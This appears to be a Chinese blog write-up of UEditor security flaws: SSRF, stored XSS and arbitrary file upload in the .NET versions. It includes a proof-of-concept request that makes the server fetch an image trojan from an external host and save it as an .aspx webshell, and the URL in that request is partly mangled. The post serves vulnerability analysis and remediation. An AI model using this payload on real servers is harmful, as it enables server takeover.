老项目之UEditor漏洞问题

本文详细分析了UEditor编辑器存在的安全问题,包括1.4.3版本的SSRF漏洞,允许内网探测;1.4.3.3和1.5.0版本的文件上传漏洞,可能导致服务器被控制;以及1.3.6版本的文件上传漏洞。同时,还探讨了1.4.3版本的Upload XSS风险,以及如何利用这些漏洞进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

1、文件上传漏洞

2、SSRF 漏洞

3、Upload XSS

ueidtor 安全漏洞 _ UEditor SSRF 漏洞 ( JSP 版本 ) 分析与复现


UEditor 是由百度开发的开源富文本编辑器,开源基于 BSD 协议 ,

小巧灵活 ,使用简单 ,有很多 web 程序在使用 UEditor 编辑器 。

1、项目所使用的 UEditor 组件存在 ssrf 漏洞

风险级别 : 低风险

风险分析 : 可通过此漏洞探测内容 ,甚至服务器权限

2、项目所使用的 UEditor 组件存在 xml 文件上传触发存储型 XSS 漏洞

风险级别 : 中风险

风险分析 : 可通过此漏洞盗取用户凭证,为黑产引流

3、项目所使用的 UEditor 组件目录下存在敏感信息泄漏

风险级别 : 中风险

风险分析 : 可通过此漏洞泄漏信息


1、文件上传漏洞

该任意文件上传漏洞存在于 1.4.3.3 、 1.5.0 和 1.3.6 版本中 ,

并且只有 ** .NET ** 版本受该漏洞影响 。

黑客可以利用该漏洞上传木马文件,执行命令控制服务器 。

ueditor 中已经下架 .net 版本 ,但历史版本中可以下载 1.4.3 版本 ,

但是否是 1.4.3.3 目前还没验证 。

* 该漏洞是由于 上传文件 时 ,使用的 CrawlerHandler 类未对 文件类型 进行检验 ,

导致了任意文件上传 。1.4.3.3 和 1.5.0 版本利用方式稍有不同 ,

1.4.3.3 需要一个能正确解析的域名 。而 1.5.0 用 IP 和 普通域名 都可以 。

* 相对来说 1.5.0 版本更加容易触发此漏洞 ;

而在 1.4.3.3 版本中攻击者需要提供一个正常的域名地址就可以绕过判断 ;

首先 1.5.0 版本进行测试 ,需要先在外网服务器上传一个图片木马 ,

比如 : 1.jpg/1.gif/1.png 都可以 ,下面 x.x.x.x 是外网服务器地址 ,

source[] 参数值改为图片木马地址 ,并在结尾加上 “?.aspx” 即可 getshell ,利用 POC :

POST /ueditor/net/controller.ashx?action=catchimage

source%5B%5D=https%3A%2F%2Fblue-sea-697d.quartiers047.workers.dev%3A443%2Fhttp%2Fx.x.x.x/1.gif?.aspx

复现成功会返回路径信息,可以看到木马已经成功被传上去了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值